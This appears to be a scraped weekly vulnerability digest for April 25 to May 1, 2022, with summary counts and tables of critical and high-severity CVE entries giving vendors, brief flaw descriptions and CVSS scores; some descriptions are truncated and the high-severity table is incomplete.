Weekly Vulnerabilities Reports > April 25 to May 1, 2022
Overview
310 new vulnerabilities reported during this period, including 66 critical vulnerabilities and 107 high severity vulnerabilities. This weekly summary report vulnerabilities in 340 products from 199 vendors including IBM, Fedoraproject, Debian, Jetbrains, and Redhat. Vulnerabilities are notably categorized as "Cross-site Scripting", "Path Traversal", "Out-of-bounds Write", "SQL Injection", and "Missing Authorization".
- 253 reported vulnerabilities are remotely exploitables.
- 93 reported vulnerabilities are related to weaknesses in OWASP Top Ten.
- 178 reported vulnerabilities are exploitable by an anonymous user.
- IBM has the most reported vulnerabilities, with 19 reported vulnerabilities.
- Mediawiki has the most reported critical vulnerabilities, with 2 reported vulnerabilities.
VULNERABILITIES
VULNERABILITIES
VULNERABILITIES
VULNERABILITIES
VULNERABILITIES
EXPLOITABLE
EXPLOITABLE
AVAILABLE
ANONYMOUSLY
WEB APPLICATION
Vulnerability Details
The following table list reported vulnerabilities for the period covered by this report:
66 Critical Vulnerabilities
DATE | CVE | VENDOR | VULNERABILITY | CVSS |
---|---|---|---|---|
2022-04-30 | CVE-2021-42001 | Pingidentity | Unspecified vulnerability in Pingidentity Pingid Desktop PingID Desktop prior to 1.7.3 has a misconfiguration in the encryption libraries which can lead to sensitive data exposure. | 9.9 |
2022-05-01 | CVE-2022-25301 | Jsgui Lang Essentials Project | Unspecified vulnerability in Jsgui-Lang-Essentials Project Jsgui-Lang-Essentials All versions of package jsgui-lang-essentials are vulnerable to Prototype Pollution due to allowing all Object attributes to be altered, including their magical attributes such as proto, constructor and prototype. | 9.8 |
2022-05-01 | CVE-2022-21167 | Ldqk | Unspecified vulnerability in Ldqk Masuit.Tools All versions of package masuit.tools.core are vulnerable to Arbitrary Code Execution via the ReceiveVarData<T> function in the SocketClient.cs component. | 9.8 |
2022-05-01 | CVE-2022-21189 | Dexie | Unspecified vulnerability in Dexie The package dexie before 3.2.2, from 4.0.0-alpha.1 and before 4.0.0-alpha.3 are vulnerable to Prototype Pollution in the Dexie.setByKeyPath(obj, keyPath, value) function which does not properly check the keys being set (like __proto__ or constructor). | 9.8 |
2022-05-01 | CVE-2022-22143 | Mozilla | Unspecified vulnerability in Mozilla Convict The package convict before 6.2.2 are vulnerable to Prototype Pollution via the convict function due to missing validation of parentKey. | 9.8 |
2022-05-01 | CVE-2022-23923 | Jailed Project | Unspecified vulnerability in Jailed Project Jailed All versions of package jailed are vulnerable to Sandbox Bypass via an exported alert() method which can access the main application. | 9.8 |
2022-05-01 | CVE-2022-24437 | GIT Pull OR Clone Project | Argument Injection or Modification vulnerability in Git-Pull-Or-Clone Project Git-Pull-Or-Clone The package git-pull-or-clone before 2.0.2 are vulnerable to Command Injection due to the use of the --upload-pack feature of git which is also supported for git clone. | 9.8 |
2022-05-01 | CVE-2022-25767 | Ureport2 Project | Deserialization of Untrusted Data vulnerability in Ureport2 Project Ureport2 All versions of package com.bstek.ureport:ureport2-console are vulnerable to Remote Code Execution by connecting to a malicious database server, causing arbitrary file read and deserialization of local gadgets. | 9.8 |
2022-05-01 | CVE-2022-25842 | Alibabagroup | Path Traversal vulnerability in Alibabagroup One-Java-Agent All versions of package com.alibaba.oneagent:one-java-agent-plugin are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip) using a specially crafted archive that holds directory traversal filenames (e.g. | 9.8 |
2022-05-01 | CVE-2022-28481 | CSV Safe Project | Improper Neutralization of Formula Elements in a CSV File vulnerability in Csv-Safe Project Csv-Safe CSV-Safe gem < 3.0.0 doesn't filter out special characters which could trigger CSV Injection. | 9.8 |
2022-04-29 | CVE-2022-28480 | Allmediaserver | Classic Buffer Overflow vulnerability in Allmediaserver 1.6 ALLMediaServer 1.6 is vulnerable to Buffer Overflow via MediaServer.exe. | 9.8 |
2022-04-29 | CVE-2022-28994 | Smallsrv | Classic Buffer Overflow vulnerability in Smallsrv Small Http Server 3.06 Small HTTP Server version 3.06 suffers from a remote buffer overflow vulnerability via long GET request. | 9.8 |
2022-04-29 | CVE-2021-43938 | Smartptt | Missing Authorization vulnerability in Smartptt Scada Server 1.4 Elcomplus SmartPTT SCADA Server is vulnerable to an unauthenticated user can request various files from the server without any authentication or authorization. | 9.8 |
2022-04-29 | CVE-2022-28452 | Redplanetcomputers | SQL Injection vulnerability in Redplanetcomputers Laundry Management System 1.0 Red Planet Laundry Management System 1.0 is vulnerable to SQL Injection. | 9.8 |
2022-04-29 | CVE-2021-44596 | Wondershare | Unspecified vulnerability in Wondershare Dr.Fone 20211206 Wondershare LTD Dr. | 9.8 |
2022-04-29 | CVE-2022-1531 | RTX Project | SQL Injection vulnerability in RTX Project RTX SQL injection vulnerability in ARAX-UI Synonym Lookup functionality in GitHub repository rtxteam/rtx prior to checkpoint_2022-04-20 . | 9.8 |
2022-04-29 | CVE-2022-29904 | Mediawiki | SQL Injection vulnerability in Mediawiki The SemanticDrilldown extension for MediaWiki through 1.37.2 (before e688bdba6434591b5dff689a45e4d53459954773) allows SQL injection with certain '-' and '_' constraints. | 9.8 |
2022-04-29 | CVE-2022-29906 | Mediawiki | Missing Authorization vulnerability in Mediawiki The admin API module in the QuizGame extension for MediaWiki through 1.37.2 (before 665e33a68f6fa1167df99c0aa18ed0157cdf9f66) omits a check for the quizadmin user. | 9.8 |
2022-04-28 | CVE-2022-24449 | RT Solar | Server-Side Request Forgery (SSRF) vulnerability in Rt-Solar Solar Appscreener 3.10.4 Solar appScreener through 3.10.4, when a valid license is not present, allows XXE and SSRF attacks via a crafted XML document. | 9.8 |
2022-04-28 | CVE-2022-29081 | Zohocorp | Path Traversal vulnerability in Zohocorp products Zoho ManageEngine Access Manager Plus before 4302, Password Manager Pro before 12007, and PAM360 before 5401 are vulnerable to access-control bypass on a few Rest API URLs (for SSOutAction. | 9.8 |
2022-04-28 | CVE-2022-29556 | Northern Tech | Server-Side Request Forgery (SSRF) vulnerability in Northern.Tech Mender 3.2.0/3.2.1 The iot-manager microservice 1.0.0 in Northern.tech Mender Enterprise before 3.2.2 allows SSRF because the Azure IoT Hub integration provides several SSRF primitives that can execute cross-tenant actions via internal API endpoints. | 9.8 |
2022-04-28 | CVE-2022-29411 | Hermit Project | Unspecified vulnerability in Hermit Project Hermit 3.1.6 SQL Injection (SQLi) vulnerability in Mufeng's Hermit ????? plugin <= 3.1.6 on WordPress allows attackers to execute SQLi attack via (&id). | 9.8 |
2022-04-28 | CVE-2021-43934 | Smartptt | Unspecified vulnerability in Smartptt Scada 1.1 Elcomplus SmartPTT is vulnerable as the backup and restore system does not adequately validate upload requests, enabling a malicious user to potentially upload arbitrary files. | 9.8 |
2022-04-28 | CVE-2021-41921 | Xxyopen | Unrestricted Upload of File with Dangerous Type vulnerability in Xxyopen Novel-Plus 3.6.1 novel-plus V3.6.1 allows unrestricted file uploads. | 9.8 |
2022-04-28 | CVE-2022-28719 | Hammock | Missing Authentication for Critical Function vulnerability in Hammock Assetview 9.2 Missing authentication for critical function in AssetView prior to Ver.13.2.0 allows a remote unauthenticated attacker with some knowledge on the system configuration to upload a crafted configuration file to the managing server, which may result in the managed clients to execute arbitrary code with the administrative privilege. | 9.8 |
2022-04-27 | CVE-2022-29859 | Amb1 SDK Project | Unspecified vulnerability in Amb1 SDK Project Amb1 SDK component/common/network/dhcp/dhcps.c in ambiot amb1_sdk (aka SDK for Ameba1) before 2022-03-11 mishandles data structures for DHCP packet data. | 9.8 |
2022-04-27 | CVE-2021-34601 | Bender | Use of Hard-coded Credentials vulnerability in Bender Cc612 Firmware and Icc15Xx Firmware In Bender/ebee Charge Controllers in multiple versions are prone to Hardcoded Credentials. | 9.8 |
2022-04-27 | CVE-2021-38869 | IBM | Session Fixation vulnerability in IBM Qradar Security Information and Event Manager IBM QRadar SIEM 7.3, 7.4, and 7.5 in some situations may not automatically log users out after they exceede their idle timeout. | 9.8 |
2022-04-27 | CVE-2022-27336 | Seacms | Unspecified vulnerability in Seacms 11.6 Seacms v11.6 was discovered to contain a remote code execution (RCE) vulnerability via the component /admin/weixin.php. | 9.8 |
2022-04-27 | CVE-2021-46422 | Telesquare | OS Command Injection vulnerability in Telesquare Sdt-Cs3B1 Firmware 1.1.0 Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication. | 9.8 |
2022-04-27 | CVE-2021-46442 | Dlink | Unspecified vulnerability in Dlink Dir-825 Firmware In the "webupg" binary of D-Link DIR-825 G1, attackers can bypass authentication through parameters "autoupgrade.asp", and perform functions such as downloading configuration files and updating firmware without authorization. | 9.8 |
2022-04-26 | CVE-2022-28521 | Zcms Project | Unspecified vulnerability in Zcms Project Zcms 20170206 ZCMS v20170206 was discovered to contain a file inclusion vulnerability via index.php?m=home&c=home&a=sp_set_config. | 9.8 |
2022-04-26 | CVE-2022-28524 | Ed01 CMS Project | SQL Injection vulnerability in Ed01-Cms Project Ed01-Cms 20180505 ED01-CMS v20180505 was discovered to contain a SQL injection vulnerability via the component post.php. | 9.8 |
2022-04-26 | CVE-2022-24881 | Ballcat | Improper Input Validation vulnerability in Ballcat Codegen Ballcat Codegen provides the function of online editing code to generate templates. | 9.8 |
2022-04-26 | CVE-2022-24883 | Freerdp Fedoraproject | Improper Authentication vulnerability in multiple products FreeRDP is a free implementation of the Remote Desktop Protocol (RDP). | 9.8 |
2022-04-26 | CVE-2022-27299 | Hospital Management System Project | SQL Injection vulnerability in Hospital Management System Project Hospital Management System 1.0 Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the component room.php. | 9.8 |
2022-04-26 | CVE-2022-27468 | Monstaftp | Unrestricted Upload of File with Dangerous Type vulnerability in Monstaftp Monsta FTP 2.10.3 Monstaftp v2.10.3 was discovered to contain an arbitrary file upload which allows attackers to execute arbitrary code via a crafted file uploaded to the web server. | 9.8 |
2022-04-26 | CVE-2022-27469 | Monstaftp | Server-Side Request Forgery (SSRF) vulnerability in Monstaftp Monsta FTP 2.10.3 Monstaftp v2.10.3 was discovered to allow attackers to execute Server-Side Request Forgery (SSRF). | 9.8 |
2022-04-26 | CVE-2022-27984 | Cuppacms | SQL Injection vulnerability in Cuppacms 1.0 CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via the menu_filter parameter at /administrator/templates/default/html/windows/right.php. | 9.8 |
2022-04-26 | CVE-2022-27985 | Cuppacms | SQL Injection vulnerability in Cuppacms 1.0 CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via /administrator/alerts/alertLightbox.php. | 9.8 |
2022-04-26 | CVE-2022-24706 | Apache | Unspecified vulnerability in Apache Couchdb In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges. | 9.8 |
2022-04-26 | CVE-2022-29806 | Zoneminder | Path Traversal vulnerability in Zoneminder ZoneMinder before 1.36.13 allows remote code execution via an invalid language. | 9.8 |
2022-04-26 | CVE-2022-29499 | Mitel | Improper Input Validation vulnerability in Mitel Mivoice Connect The Service Appliance component in Mitel MiVoice Connect through 19.2 SP3 allows remote code execution because of incorrect data validation. | 9.8 |
2022-04-25 | CVE-2022-23457 | Owasp Oracle Netapp | ESAPI (The OWASP Enterprise Security API) is a free, open source, web application security control library. | 9.8 |
2022-04-25 | CVE-2022-25866 | GIT PHP Project | Argument Injection or Modification vulnerability in Git-PHP Project Git-PHP The package czproject/git-php before 4.0.3 are vulnerable to Command Injection via git argument injection. | 9.8 |
2022-04-25 | CVE-2022-0541 | Flothemes | Unspecified vulnerability in Flothemes Flo-Launch The flo-launch WordPress plugin before 2.4.1 injects code into wp-config.php when creating a cloned site, allowing any attacker to initiate a new site install by setting the flo_custom_table_prefix cookie to an arbitrary value. | 9.8 |
2022-04-25 | CVE-2022-0657 | 5 Stars Rating Funnel Project | Unspecified vulnerability in 5 Stars Rating Funnel Project 5 Stars Rating Funnel The 5 Stars Rating Funnel WordPress Plugin | RRatingg WordPress plugin before 1.2.54 does not properly sanitise, validate and escape lead ids before using them in a SQL statement via the rrtngg_delete_leads AJAX action, available to unauthenticated users, leading to an unauthenticated SQL injection issue. | 9.8 |
2022-04-25 | CVE-2022-0693 | Devbunch | SQL Injection vulnerability in Devbunch Master Elements The Master Elements WordPress plugin through 8.0 does not validate and escape the meta_ids parameter of its remove_post_meta_condition AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL Injection | 9.8 |
2022-04-25 | CVE-2022-0769 | Usersultra | Unspecified vulnerability in Usersultra Users Ultra The Users Ultra WordPress plugin through 3.1.0 fails to properly sanitize and escape the data_target parameter before it is being interpolated in an SQL statement and then executed via the rating_vote AJAX action (available to both unauthenticated and authenticated users), leading to an SQL Injection. | 9.8 |
2022-04-25 | CVE-2022-0782 | Donations Project | Unspecified vulnerability in Donations Project Donations The Donations WordPress plugin through 1.8 does not sanitise and escape the nd_donations_id parameter before using it in a SQL statement via the nd_donations_single_cause_form_validate_fields_php_function AJAX action (available to unauthenticated users), leading to an unauthenticated SQL Injection | 9.8 |
2022-04-25 | CVE-2022-1390 | Admin Word Count Column Project | Unspecified vulnerability in Admin Word Count Column Project Admin Word Count Column The Admin Word Count Column WordPress plugin through 2.2 does not validate the path parameter given to readfile(), which could allow unauthenticated attackers to read arbitrary files on server running old version of PHP susceptible to the null byte technique. | 9.8 |
2022-04-25 | CVE-2022-1391 | Kanev | Unspecified vulnerability in Kanev CAB Fare Calculator 1.0.3 The Cab fare calculator WordPress plugin before 1.0.4 does not validate the controller parameter before using it in require statements, which could lead to Local File Inclusion issues. | 9.8 |
2022-04-25 | CVE-2022-28093 | Online Sports Complex Booking System Project | Unspecified vulnerability in Online Sports Complex Booking System Project Online Sports Complex Booking System 1.0 SCBS Online Sports Venue Reservation System v1.0 was discovered to contain a local file inclusion vulnerability which allow attackers to execute arbitrary code via a crafted PHP file. | 9.8 |
2022-04-25 | CVE-2022-29078 | EJS | Code Injection vulnerability in EJS 3.1.6 The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. | 9.8 |
2022-04-25 | CVE-2022-27311 | Gibbon Project | Server-Side Request Forgery (SSRF) vulnerability in Gibbon Project Gibbon Gibbon v3.4.4 and below allows attackers to execute a Server-Side Request Forgery (SSRF) via a crafted URL. | 9.8 |
2022-04-25 | CVE-2022-27429 | Jizhicms | Server-Side Request Forgery (SSRF) vulnerability in Jizhicms 1.9.5 Jizhicms v1.9.5 was discovered to contain a Server-Side Request Forgery (SSRF) vulnerability via /admin.php/Plugins/update.html. | 9.8 |
2022-04-25 | CVE-2021-45837 | Terra Master | Unspecified vulnerability in Terra-Master TOS 4.2.152107141517 It is possible to execute arbitrary commands as root in Terramaster F4-210, F2-210 TOS 4.2.X (4.2.15-2107141517) by sending a specifically crafted input to /tos/index.php?app/del. | 9.8 |
2022-04-25 | CVE-2021-45840 | Terra Master | Unspecified vulnerability in Terra-Master TOS 4.2.152107141517 It is possible to execute arbitrary commands as root in Terramaster F4-210, F2-210 TOS 4.2.X (4.2.15-2107141517) by sending specifically crafted input to /tos/index.php?app/app_start_stop. | 9.8 |
2022-04-25 | CVE-2022-29264 | Coreboot | Unspecified vulnerability in Coreboot An issue was discovered in coreboot 4.13 through 4.16. | 9.8 |
2022-04-25 | CVE-2022-29077 | Ripple | Out-of-bounds Write vulnerability in Ripple Rippled A heap-based buffer overflow exists in rippled before 1.8.5. | 9.8 |
2022-04-28 | CVE-2022-28114 | Dscms Project | Unspecified vulnerability in Dscms Project Dscms 3.0 DSCMS v3.0 was discovered to contain an arbitrary file deletion vulnerability via /controller/Adv.php. | 9.1 |
2022-04-28 | CVE-2021-41945 | Encode | Improper Input Validation vulnerability in Encode Httpx Encode OSS httpx < 0.23.0 is affected by improper input validation in `httpx.URL`, `httpx.Client` and some functions using `httpx.URL.copy_with`. | 9.1 |
2022-04-27 | CVE-2021-46424 | Telesquare | Unspecified vulnerability in Telesquare Tlr-2005Ksh Firmware 1.0.0 Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request. | 9.1 |
2022-04-27 | CVE-2022-27332 | Zammad | Missing Authentication for Critical Function vulnerability in Zammad An access control issue in Zammad v5.0.3 allows attackers to write entries to the CTI caller log without authentication. | 9.1 |
2022-04-28 | CVE-2022-28101 | Lyonbros | Cross-site Scripting vulnerability in Lyonbros Turtl 0.7.2.6 Turtlapp Turtle Note v0.7.2.6 does not filter the <meta> tag during markdown parsing, allowing attackers to execute HTML injection. | 9.0 |
2022-04-27 | CVE-2022-28464 | Apifox | Cross-site Scripting vulnerability in Apifox Apifox through 2.1.6 is vulnerable to Cross Site Scripting (XSS) which can lead to remote code execution. | 9.0 |
107 High Vulnerabilities
DATE | CVE | VENDOR | VULNERABILITY | CVSS |
---|---|---|---|---|
2022-04-29 | CVE-2022-1543 | Erudika | Unspecified vulnerability in Erudika Scoold Improper handling of Length parameter in GitHub repository erudika/scoold prior to 1.49.4. | 8.8 |
2022-04-29 | CVE-2021-36207 | Johnsoncontrols | Improper Privilege Management vulnerability in Johnsoncontrols products Under certain circumstances improper privilege management in Metasys ADS/ADX/OAS servers versions 10 and 11 could allow an authenticated user to elevate their privileges to administrator. | 8.8 |
2022-04-29 | CVE-2022-29451 | Rarathemes | Unspecified vulnerability in Rarathemes Rara ONE Click Demo Import Cross-Site Request Forgery (CSRF) leading to Arbitrary File Upload vulnerability in Rara One Click Demo Import plugin <= 1.2.9 on WordPress allows attackers to trick logged-in admin users into uploading dangerous files into /wp-content/uploads/ directory. | 8.8 |
2022-04-29 | CVE-2022-29936 | USU | Deserialization of Untrusted Data vulnerability in USU Oracle Optimization 5.16.2 USU Oracle Optimization before 5.17 allows authenticated quantum users to achieve remote code execution because of /v2/quantum/save-data-upload-big-file Java deserialization. | 8.8 |
2022-04-29 | CVE-2022-29937 | USU | OS Command Injection vulnerability in USU Oracle Optimization 20210817 USU Oracle Optimization before 5.17.5 allows authenticated DataCollection users to achieve agent root access because some common OS commands are blocked but (for example) an OS command for base64 decoding is not blocked. | 8.8 |
2022-04-29 | CVE-2021-43937 | Smartptt | Cross-Site Request Forgery (CSRF) vulnerability in Smartptt Scada Server 1.4 Elcomplus SmartPTT SCADA Server web application does not, or cannot, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. | 8.8 |
2022-04-29 | CVE-2022-1227 | Podman Project Psgo Project Redhat Fedoraproject | Improper Privilege Management vulnerability in multiple products A privilege escalation flaw was found in Podman. | 8.8 |
2022-04-29 | CVE-2021-44595 | Wondershare | Missing Authorization vulnerability in Wondershare Dr.Fone 20211206 Wondershare Dr. | 8.8 |
2022-04-28 | CVE-2022-29555 | Northern Tech | Cross-Site Request Forgery (CSRF) vulnerability in Northern.Tech Mender The Deviceconnect microservice through 1.3.0 in Northern.tech Mender Enterprise before 3.2.2. | 8.8 |
2022-04-28 | CVE-2022-29410 | Hermit Project | Unspecified vulnerability in Hermit Project Hermit 3.1.6 Authenticated SQL Injection (SQLi) vulnerability in Mufeng's Hermit ????? plugin <= 3.1.6 on WordPress allows attackers with Subscriber or higher user roles to execute SQLi attack via (&ids). | 8.8 |
2022-04-28 | CVE-2022-28892 | Mahara | Cross-Site Request Forgery (CSRF) vulnerability in Mahara Mahara before 20.10.5, 21.04.4, 21.10.2, and 22.04.0 is vulnerable to Cross Site Request Forgery (CSRF) because randomly generated tokens are too easily guessable. | 8.8 |
2022-04-28 | CVE-2021-43939 | Smartptt | Unspecified vulnerability in Smartptt Scada 1.1 Elcomplus SmartPTT is vulnerable when a low-authenticated user can access higher level administration authorization by issuing requests directly to the desired endpoints. | 8.8 |
2022-04-28 | CVE-2022-1509 | Hestiacp | Unspecified vulnerability in Hestiacp Control Panel Command Injection Vulnerability in GitHub repository hestiacp/hestiacp prior to 1.5.12. | 8.8 |
2022-04-27 | CVE-2022-22315 | IBM | Unspecified vulnerability in IBM Urbancode Deploy IBM UrbanCode Deploy (UCD) 7.2.2.1 could allow an authenticated user with special permissions to obtain elevated privileges due to improper handling of permissions. | 8.8 |
2022-04-27 | CVE-2021-34592 | Bender | Unspecified vulnerability in Bender Cc612 Firmware and Icc15Xx Firmware In Bender/ebee Charge Controllers in multiple versions are prone to Command injection via Web interface. | 8.8 |
2022-04-27 | CVE-2021-34602 | Bender | Unspecified vulnerability in Bender Cc612 Firmware and Icc15Xx Firmware In Bender/ebee Charge Controllers in multiple versions are prone to Command injection via Web interface. | 8.8 |
2022-04-27 | CVE-2021-46441 | Dlink | OS Command Injection vulnerability in Dlink Dir-825 Firmware In the "webupg" binary of D-Link DIR-825 G1, because of the lack of parameter verification, attackers can use "cmd" parameters to execute arbitrary system commands after obtaining authorization. | 8.8 |
2022-04-26 | CVE-2022-28525 | Ed01 CMS Project | Unrestricted Upload of File with Dangerous Type vulnerability in Ed01-Cms Project Ed01-Cms 20180505 ED01-CMS v20180505 was discovered to contain an arbitrary file upload vulnerability via /admin/users.php?source=edit_user&id=1. | 8.8 |
2022-04-26 | CVE-2022-28528 | Bloofox | Unrestricted Upload of File with Dangerous Type vulnerability in Bloofox Bloofoxcms 0.5.2.1 bloofoxCMS v0.5.2.1 was discovered to contain an arbitrary file upload vulnerability via /admin/index.php?mode=content&page=media&action=edit. | 8.8 |
2022-04-26 | CVE-2021-26629 | Tobesoft | Path Traversal vulnerability in Tobesoft Xplatform A path traversal vulnerability in XPLATFORM's runtime archive function could lead to arbitrary file creation. | 8.8 |
2022-04-25 | CVE-2022-29419 | 3Xsocializer Project | Unspecified vulnerability in 3Xsocializer Project 3Xsocializer 0.98.22 SQL Injection (SQLi) vulnerability in Don Crowther's 3xSocializer plugin <= 0.98.22 at WordPress possible for users with a low role like a subscriber or higher. | 8.8 |
2022-04-25 | CVE-2021-24957 | Advanced Page Visit Counter Project | Unspecified vulnerability in Advanced Page Visit Counter Project Advanced Page Visit Counter The Advanced Page Visit Counter WordPress plugin before 6.1.6 does not escape the artID parameter before using it in a SQL statement in the apvc_reset_count_art AJAX action, available to any authenticated user, leading to a SQL injection | 8.8 |
2022-04-25 | CVE-2021-4225 | Smartypantsplugins | Unspecified vulnerability in Smartypantsplugins SP Project & Document Manager The SP Project & Document Manager WordPress plugin before 4.24 allows any authenticated users, such as subscribers, to upload files. | 8.8 |
2022-04-25 | CVE-2022-26111 | Canon | Expression Language Injection vulnerability in Canon Irisnext 9.8.28 The BeanShell components of IRISNext through 9.8.28 allow execution of arbitrary commands on the target server by creating a custom search (or editing an existing/predefined search) of the documents. | 8.8 |
2022-04-25 | CVE-2022-28053 | Typemill | Unrestricted Upload of File with Dangerous Type vulnerability in Typemill 1.5.3 Typemill v1.5.3 was discovered to contain an arbitrary file upload vulnerability via the upload function. | 8.8 |
2022-04-25 | CVE-2021-45836 | Terra Master | Unspecified vulnerability in Terra-Master TOS 4.2.152107141517 An authenticated attacker can execute arbitrary commands as root in Terramaster F4-210, F2-210 TOS 4.2.X (4.2.15-2107141517) by injecting a maliciously crafted input in the request through /tos/index.php?app/hand_app. | 8.8 |
2022-04-29 | CVE-2022-24900 | Piano LED Visualizer Project | Exposure of Resource to Wrong Sphere vulnerability in Piano LED Visualizer Project Piano LED Visualizer Piano LED Visualizer is software that allows LED lights to light up as a person plays a piano connected to a computer. | 8.6 |
2022-04-27 | CVE-2021-34588 | Bender | Unspecified vulnerability in Bender Cc612 Firmware and Icc15Xx Firmware In Bender/ebee Charge Controllers in multiple versions are prone to unprotected data export. | 8.6 |
2022-04-25 | CVE-2022-1459 | Open EMR | Authorization Bypass Through User-Controlled Key vulnerability in Open-Emr Openemr Non-Privilege User Can View Patient’s Disclosures in GitHub repository openemr/openemr prior to 6.1.0.1. | 8.3 |
2022-04-29 | CVE-2021-4206 | Qemu Redhat Debian | Incorrect Calculation of Buffer Size vulnerability in multiple products A flaw was found in the QXL display device emulation in QEMU. | 8.2 |
2022-04-29 | CVE-2021-4207 | Qemu Redhat Debian | Classic Buffer Overflow vulnerability in multiple products A flaw was found in the QXL display device emulation in QEMU. | 8.2 |
2022-05-01 | CVE-2022-25645 | Dset Project | Unspecified vulnerability in Dset Project Dset All versions of package dset are vulnerable to Prototype Pollution via 'dset/merge' mode, as the dset function checks for prototype pollution by validating if the top-level path contains __proto__, constructor or protorype. | 8.1 |
2022-04-26 | CVE-2022-28058 | Verydows | Path Traversal vulnerability in Verydows 2.0 Verydows v2.0 was discovered to contain an arbitrary file deletion vulnerability via \backend\file_controller.php. | 8.1 |
2022-04-26 | CVE-2022-28059 | Verydows | Path Traversal vulnerability in Verydows 2.0 Verydows v2.0 was discovered to contain an arbitrary file deletion vulnerability via \backend\database_controller.php. | 8.1 |
2022-04-26 | CVE-2022-28523 | Hongcms Project | Path Traversal vulnerability in Hongcms Project Hongcms 3.0.0 HongCMS 3.0.0 allows arbitrary file deletion via the component /admin/index.php/template/ajax?action=delete. | 8.1 |
2022-04-26 | CVE-2022-28527 | Dhcms Project | Path Traversal vulnerability in Dhcms Project Dhcms 20170919 dhcms v20170919 was discovered to contain an arbitrary folder deletion vulnerability via /admin.php?r=admin/AdminBackup/del. | 8.1 |
2022-04-26 | CVE-2022-28918 | Njtech | Unspecified vulnerability in Njtech Greencms 2.3.0603 GreenCMS v2.3.0603 was discovered to contain an arbitrary file deletion vulnerability via /index.php?m=admin&c=custom&a=plugindelhandle&plugin_name=. | 8.1 |
2022-04-25 | CVE-2021-25094 | Brandexponents | Unspecified vulnerability in Brandexponents Tatsu The Tatsu WordPress plugin before 3.3.12 add_custom_font action can be used without prior authentication to upload a rogue zip file which is uncompressed under the WordPress's upload directory. | 8.1 |
2022-04-25 | CVE-2021-45841 | Terra Master | Use of Hard-coded Credentials vulnerability in Terra-Master TOS 4.2.152107141517 In Terramaster F4-210, F2-210 TOS 4.2.X (4.2.15-2107141517), an attacker can self-sign session cookies by knowing the target's MAC address and the user's password hash. | 8.1 |
2022-04-25 | CVE-2021-40680 | Articatech | Path Traversal vulnerability in Articatech web Proxy 4.30.000000 There is a Directory Traversal vulnerability in Artica Proxy (4.30.000000 SP206 through SP255, and VMware appliance 4.30.000000 through SP273) via the filename parameter to /cgi-bin/main.cgi. | 8.1 |
2022-04-25 | CVE-2022-29603 | Universis | SQL Injection vulnerability in Universis Universis-Api A SQL Injection vulnerability exists in UniverSIS UniverSIS-API through 1.2.1 via the $select parameter to multiple API endpoints. | 8.1 |
2022-04-25 | CVE-2021-39040 | IBM | Unrestricted Upload of File with Dangerous Type vulnerability in IBM Planning Analytics Workspace 2.0 IBM Planning Analytics Workspace 2.0 could be vulnerable to malicious file upload by not validating the file types or sizes. | 8.0 |
2022-05-01 | CVE-2022-1544 | Luya | Improper Neutralization of Formula Elements in a CSV File vulnerability in Luya Yii-Helpers Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in GitHub repository luyadev/yii-helpers prior to 1.2.1. | 7.8 |
2022-04-29 | CVE-2022-1403 | Deltaww | Out-of-bounds Write vulnerability in Deltaww Asda Soft 5.4.1.0 ASDA-Soft: Version 5.4.1.0 and prior does not properly sanitize input while processing a specific project file, allowing a possible out-of-bounds write condition. | 7.8 |
2022-04-29 | CVE-2022-29934 | USU | Missing Authentication for Critical Function vulnerability in USU Oracle Optimization 5.16.2 USU Oracle Optimization before 5.17.5 lacks Polkit authentication, which allows smartcollector users to achieve root access via pkexec. | 7.8 |
2022-04-29 | CVE-2022-1533 | Libmobi Project | Out-of-bounds Read vulnerability in Libmobi Project Libmobi Buffer Over-read in GitHub repository bfabiszewski/libmobi prior to 0.11. | 7.8 |
2022-04-27 | CVE-2022-24735 | Redis Fedoraproject Netapp Oracle | Redis is an in-memory database that persists on disk. | 7.8 |
2022-04-27 | CVE-2021-34591 | Bender | Unspecified vulnerability in Bender Cc612 Firmware and Icc15Xx Firmware In Bender/ebee Charge Controllers in multiple versions are prone to Local privilege Escalation. | 7.8 |
2022-04-27 | CVE-2022-29505 | Linecorp | Unspecified vulnerability in Linecorp Line Due to build misconfiguration in openssl dependency, LINE for Windows before 7.8 is vulnerable to DLL injection that could lead to privilege escalation. | 7.8 |
2022-04-27 | CVE-2022-27239 | Samba Debian Suse HP Fedoraproject | Out-of-bounds Write vulnerability in multiple products In cifs-utils through 6.14, a stack-based buffer overflow when parsing the mount.cifs ip= command-line argument could lead to local attackers gaining root privileges. | 7.8 |
2022-04-27 | CVE-2022-28085 | Htmldoc Project | Out-of-bounds Write vulnerability in Htmldoc Project Htmldoc A flaw was found in htmldoc commit 31f7804. | 7.8 |
2022-04-25 | CVE-2022-1441 | Gpac Debian | Out-of-bounds Read vulnerability in multiple products MP4Box is a component of GPAC-2.0.0, which is a widely-used third-party package on RPM Fusion. | 7.8 |
2022-04-25 | CVE-2022-22392 | IBM | Unrestricted Upload of File with Dangerous Type vulnerability in IBM Planning Analytics Workspace 2.0 IBM Planning Analytics Local 2.0 could allow an attacker to upload arbitrary executable files which, when executed by an unsuspecting victim could result in code execution. | 7.8 |
2022-04-25 | CVE-2021-36460 | Veryfitpro Project | Improper Authentication vulnerability in Veryfitpro Project Veryfitpro VeryFitPro (com.veryfit2hr.second) 3.2.8 hashes the account's password locally on the device and uses the hash to authenticate in all communication with the backend API, including login, registration and changing of passwords. | 7.8 |
2022-04-25 | CVE-2019-25059 | Artifex Debian | Artifex Ghostscript through 9.26 mishandles .completefont. | 7.8 |
2022-04-28 | CVE-2022-29814 | Jetbrains | Code Injection vulnerability in Jetbrains Intellij Idea In JetBrains IntelliJ IDEA before 2022.1 local code execution via HTML descriptions in custom JSON schemas was possible | 7.7 |
